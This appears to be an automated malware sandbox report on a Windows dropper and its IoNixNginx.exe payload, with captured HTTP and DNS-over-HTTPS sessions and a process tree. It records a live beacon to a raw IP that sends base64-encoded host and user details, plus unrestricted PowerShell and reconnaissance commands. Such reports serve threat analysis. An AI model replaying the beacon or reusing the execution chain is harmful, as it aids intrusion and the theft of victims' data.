Dec 13, 2024 14:47:41.625247002 CET | 666 | OUT | GET /login.php?event=init&id=cHJlZmluYWw=&data=OCBHQl9bb2JqZWN0IE9iamVjdF1fWU5SODJfdHJ1ZV8xMjgweDEwMjRfV2luZG93cyAxMCBQcm9fMTA4IG1pbnV0ZXMgKDAuODAgaG91cnMpX0M6XFVzZXJzXGZyb250ZGVza18wNjY2NTZfZnJvbnRkZXNrX1dpbmRvd3NfTlRfeDY0XzEwLjAuMTkwNDVfQzpcVXNlcnNcZnJvbnRkZXNrXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBfRlJPTlRERVNLLVBDX19JbnRlbDY0IEZhbWlseSA2IE1vZGVsIDE0MyBTdGVwcGluZyA4LCBHZW51aW5lSW50ZWxfQU1ENjRfQzpfMl9DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBcMnB2dFBFUzV0N2FvVjNlWG5Xcnl3eXRGaTEwXElvTml4TmdpbnguZXhl HTTP/1.1
                                                                                                                                                                      Accept: application/json, text/plain, */*
                                                                                                                                                                      User-Agent: axios/0.27.2
                                                                                                                                                                      Host: 159.100.18.192
                                                                                                                                                                      Connection: close
Dec 13, 2024 14:47:42.893603086 CET | 199 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                      Date: Fri, 13 Dec 2024 13:47:42 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Data Raw: 66 0d 0a 42 75 69 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: fBuild not found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49771 | 172.217.19.228 | 443 | 1964 | C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-13 13:47:00 UTC | 128 | OUT | GET / HTTP/1.1
                                                                                                                                                                      Accept: application/json, text/plain, */*
                                                                                                                                                                      User-Agent: axios/0.27.2
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: close
2024-12-13 13:47:01 UTC | 1189 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 13 Dec 2024 13:47:00 GMT
                                                                                                                                                                      Expires: -1
                                                                                                                                                                      Cache-Control: private, max-age=0
                                                                                                                                                                      Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                      Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-28C_MpSOMizgN7oqpf6HtQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                      Server: gws
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Set-Cookie: AEC=AZ6Zc-UmZ4fWg7weI9uV1WB7shxgHt517lN237s5lIGLU6itRu13qT0Awdg; expires=Wed, 11-Jun-2025 13:47:00 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                      Set-Cookie: NID=520=Qzo4hMXqeMlqGCo7Dbwq5MtklheHisPIrOOJrNaqo1BPTpBXW4Z7S_Ow_JB7MX1G5jN-ejZLm3fIRUYK2q9hOvHKs6mjA4bz9PRTJ0YG_DPauDiisLmnQQlbL1Dw3UCM2WALuET7J2rkCai-ZrKqT20hxpJlpXpx9vnYUs-aDcQ1PW87Kcpl-VRVzrQiBwyjZZaRBxU8; expires=Sat, 14-Jun-2025 13:47:00 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Transfer-Encoding: chunked


                                                                                                                                                                      Session ID:1
                                                                                                                                                                      Source IP:192.168.2.7
                                                                                                                                                                      Source Port:49807
                                                                                                                                                                      Destination IP:172.64.41.3
                                                                                                                                                                      Destination Port:443
                                                                                                                                                                      PID:5076
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                      2024-12-13 13:47:16 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                      2024-12-13 13:47:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                      2024-12-13 13:47:16 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      Date: Fri, 13 Dec 2024 13:47:16 GMT
                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                      CF-RAY: 8f1667b5ca308c45-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-12-13 13:47:16 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii: wwwgstaticcom'P#)


                                                                                                                                                                      Session ID:2
                                                                                                                                                                      Source IP:192.168.2.7
                                                                                                                                                                      Source Port:49812
                                                                                                                                                                      Destination IP:172.64.41.3
                                                                                                                                                                      Destination Port:443
                                                                                                                                                                      PID:5076
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                      2024-12-13 13:47:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                      2024-12-13 13:47:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:08:46:20
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\AyqwnIUrcz.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:64'824'672 bytes
                                                                                                                                                                      MD5 hash:1E047B85B671CC99D941C13865F069DB
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:11
                                                                                                                                                                      Start time:10:31:35
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      Imagebase:0x7ff78f3a0000
                                                                                                                                                                      File size:160'084'992 bytes
                                                                                                                                                                      MD5 hash:4DE03596272B7D7B70FF34893D072F21
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:13
                                                                                                                                                                      Start time:10:31:38
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /d /s /c "chcp"
                                                                                                                                                                      Imagebase:0x7ff7abc30000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:14
                                                                                                                                                                      Start time:10:31:38
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:15
                                                                                                                                                                      Start time:10:31:39
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:chcp
                                                                                                                                                                      Imagebase:0x7ff73c760000
                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:16
                                                                                                                                                                      Start time:10:31:39
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                                                                                                                      Imagebase:0x7ff78f3a0000
                                                                                                                                                                      File size:160'084'992 bytes
                                                                                                                                                                      MD5 hash:4DE03596272B7D7B70FF34893D072F21
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:10:31:42
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
                                                                                                                                                                      Imagebase:0x7ff7abc30000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:10:31:42
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:19
                                                                                                                                                                      Start time:10:31:42
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:10:31:43
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:10:31:42
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:10:31:43
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:23
                                                                                                                                                                      Start time:10:31:43
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:24
                                                                                                                                                                      Start time:10:31:44
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff78f3a0000
                                                                                                                                                                      File size:160'084'992 bytes
                                                                                                                                                                      MD5 hash:4DE03596272B7D7B70FF34893D072F21
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:25
                                                                                                                                                                      Start time:10:31:43
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:26
                                                                                                                                                                      Start time:10:31:50
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
                                                                                                                                                                      Imagebase:0x7ff7abc30000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:27
                                                                                                                                                                      Start time:10:31:50
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:28
                                                                                                                                                                      Start time:10:31:50
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
                                                                                                                                                                      Imagebase:0x7ff6e14e0000
                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:29
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:30
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:31
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:32
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:33
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:34
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:35
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:36
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:37
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
